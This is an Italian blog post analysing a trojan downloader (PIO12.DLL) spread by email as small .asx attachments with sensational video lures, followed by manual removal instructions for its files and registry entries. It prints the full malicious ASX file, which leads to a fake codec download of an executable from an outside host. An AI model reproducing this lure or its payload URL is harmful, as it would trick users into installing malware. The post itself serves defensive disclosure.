Fermate PIO12

Stamattina ho ricevuto una segnalazione da parte di Dadescu, uno studente di Bergamo vittima, insieme ad altri sui amici, di un trojan downloader.

Riporto in parte la mail di Dadescu:

ti ho inviato questa e-mail perchè volevo chiederti se sai di strane e-mail che hanno contenuti del tipo:

- video shock mai trasmesso in TV, fatelo girare

- Ecco come si comporta il paese "Libero" con un povero ragazzo che cerca del cibo per la sua sorellina! Aprite gli occhi!

- E cercano ancora di farla passare come missione di pace!!?? Guardate co sa fanno a questa famiglia! mi piacerebbe tanto sapere perchè certe cose non si vedono in TV ma solo in blog

queste e-mail mi sono arrivate oggi da persone diverse, le stesse persone mi hannno detto che non le hanno mandate loro, una di questeinvece l'ho inviata io a tutti i miei contatti e non so come (tutte le email avevano in allegato un file .asx di pochi byte)

La mail che sta circolando porta con se i seguenti allegati (da 1KB):

Filmato_cens_ured.asx
video_0_1_05_2006.asx
riprov_evole.asx

Sono dei file con estensione .asx scritti mediante uno pseudo-codice html. Editando con un qualsiasi editore di testo i file in questione è possibile visualizzare il contenuto in chiaro.

<ASX version"3.0"> <ENTRY> <TITLE>Impossibile Trovare il Codec</TITLE> <REF HREF"http://www.vcodec-get.com/movies/video.avi"/> <DURATION VALUE"60:00"/> <BANNER HREF"http://www.vcodec-get.com/movies/codec-alert.gif"> <ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT> <MOREINFO HREF"http://www.vcodec-get.com/download/VCodec1_01b.exe" /> </BANNER> </ENTRY> </ASX>

Lanciando il file, il vostro Windows Media Player cercherà di visualizzare il video dal seguente url:

http://www.vcodec-get.com/movies/video.avi

ma l'esecuzione verrà interrotta a causa dei codec non aggiornati, invitandovi a cliccare sul banner in basso per scaricare i nuovi codec

Cliccando sul banner verrà scaricato un file eseguibile da questa url:

http://www.vcodec-get.com/download/VCodec1_01b.exe

La sua icona è molto simile ad un setup di installazione

Se si clicca sul pacchetto non verrà visualizzata nessuna finestra, nessuna progress bar, nessun avviso. Ma il programmino ha già fatto il suo lavoro installando un file PIO12.DLL, un trojan downloader, nella cartella di sistema C:\Windows\System32\ e se utilizzate un client di posta elettronica provvederà ad inviare automaticamente la mail con gli allegati a tutti i contatti presenti nella vostra rubrica utilizzando il vostro account predefinito.

Come eliminare il Trojan

Se siete stati infettati da questo trojan procedete in questo modo:

1 - Cercate nella cartella C:\Windows\System32 il file pio12.dll ed eliminatelo, se è già entrato in azione potete rimuoverlo con unlocker

2 - Molto probabilmente il trojan ha già aggiunto altri due file alla cartella C:\Windows\System32  msx.dll e iddqd.dll eliminateli entrambi.

3 - Aprite il registro di sistema (regedit) e controllate la sottochiave RUN:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

ed eliminate il valore pst

C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\pio12.dll DllDownload

4 - Fate una ricerca dei nomi pio12 (ho trovato pio12.dll e pio12.log) msx.dll e iddqd.dll all'interno del registro ed eliminate tutte le voci contenti una di queste stringhe.

5 - Per sicurezza fate una ricerca di questi file anche sul vostro hard disk, se trovate qualcosa eliminatela.

Purtroppo non tutti gli antivirus sono in grado di riconoscere e rimuovere questi file per cui l'unico modo per eliminarli è procedere manualmente come descritto sopra.

Facendo una scansione con VirusTotal solo Kaspersky e NOD32v2 riconoscono il malware. Qui uno screenshot dell'analisi del file VCodec1_01b.exe con VirusTotal.